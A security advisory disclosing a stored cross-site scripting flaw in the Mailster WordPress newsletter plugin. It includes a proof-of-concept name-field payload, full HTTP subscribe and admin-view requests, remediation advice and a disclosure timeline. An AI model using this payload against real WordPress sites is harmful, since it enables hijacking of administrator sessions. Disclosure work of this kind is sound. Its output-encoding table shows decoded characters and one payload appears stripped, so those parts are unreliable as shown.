################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Mailster - Email Newsletter Plugin for WordPress # Vendor: EverPress # CSNC ID: CSNC-2019-023 # Subject: Cross-Site Scripting (XSS) # Risk: High # Effect: Remotely exploitable # Author: Thierry Viaccoz # Date: 08.07.2020 # ################################################################################ Introduction: ------------- Mailster [1] is a newsletter plugin for WordPress. It allows to create, send and track the newsletter campaigns. Compass Security identified a stored Cross-Site Scripting (XSS) vulnerability affecting the administration interface. Successful exploitation requires no authentication and can be performed remotely. Affected: --------- Vulnerable: * Mailster - Email Newsletter Plugin for WordPress 2.4.5.1 Not vulnerable: * Mailster - Email Newsletter Plugin for WordPress 2.4.9 No other version was tested, but it is believed for the older versions to be also vulnerable. Technical Description: ---------------------- The data is not properly encoded when being echoed back on the administration interface. Therefore, it can be interpreted as executable code by the browser and allows an attacker to execute JavaScript code in the context of the victim's browser (often an administrator) when malicious subscribers to the newsletter are displayed. Exploiting this vulnerability allows an unauthenticated user to attack the administration interface of the WordPress instance. The Mailster registration forms to the newsletter strip the dangerous characters like "<" or ">". However, it was possible to embed an XSS without using them. In order to reproduce the vulnerability, subscribe to the newsletter as an unauthenticated user and use the following as name: Test" onmouseover=alert(1) onfocus=alert(1) tabindex=1 a= Request subscribing to the newsletter as an unauthenticated user with the malicious payload from above in "firstname": POST /mailster/subscribe HTTP/1.1 Host: wordpress.example.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 394 Cookie: [CUT] Connection: close _action=update&_referer=https%3A%2F%2Fwordpress.example.com%2Fnewsletter-signup%2Fprofile%2F&_hash=[CUT]&_nonce=[CUT]&formid=4&email=test%40example.com&firstname=Test%22+onmouseover%3Dalert(1)+onfocus%3Dalert(1)+tabindex%3D1+a%3D&lastname=Test&birthday=2000-01-01&drop-down=Option+A&_status=1&lists%5B0%5D=&lists%5B0%5D=1&lists%5B1%5D=&lists%5B2%5D= Response showing that the request was accepted: HTTP/1.1 200 OK Date: Wed, 09 Oct 2019 12:35:08 GMT Content-Type: application/json Connection: close Content-Length: 50 {"success":true,"html":"

Profile updated!<\/p>"} Request displaying the profile of the user subscribed before on the administration interface (WordPress Administration > Newsletter > Subscribers > Open profile): GET /wp-admin/edit.php?post_type=newsletter&page=mailster_subscribers&ID=1337 HTTP/1.1 Host: wordpress.example.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [CUT] Connection: close Response showing that it was possible to break out of the context and execute JavaScript: HTTP/1.1 200 OK Date: Wed, 09 Oct 2019 12:35:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 41730 [CUT] {firstname} [CUT] When the administrator moves the mouse on the "{firstname}" label in the "Name" attribute, the JavaScript payload is triggered and a popup is displayed. The same happens when he hits "Tab" on the keyboard. The stripping of dangerous characters on input is unsafe since there are several ways data can be loaded in the database (e.g. user registration, bulk import or by another plugin). The encoding should take place on output instead. It was also possible to exploit this by using the "Mailster Gravity Forms 1.1" [2] plugin that loads data coming from "Gravity Forms 2.4.14" [3] in Mailster. With this setup, an XSS payload could be embedded in the subscriber's name. It is then executed directly when opening the subscribers list on the administration interface. The name to use on "Gravity Forms" was the following: Test During the various fix attempts, several other stored XSS were found. Workaround / Fix: ----------------- Dangerous characters should be encoded on output according to the encoding rules of the respective type of context. The whole code should be analyzed for it and updated accordingly. For regular HTML body content, use HTML encoding: - < -> < - > -> > - " -> " - ' -> ' - & -> & As a Mailster customer, update your installation to the latest version to receive the fix. Timeline: --------- 2019-10-09: Discovery by Thierry Viaccoz 2019-10-10: Initial vendor notification 2020-03-24: Release of fixed version 2020-07-08: Coordinated public disclosure date References: ----------- [1] https://mailster.co/ [2] https://wordpress.org/plugins/mailster-gravity-forms/ [3] https://www.gravityforms.com/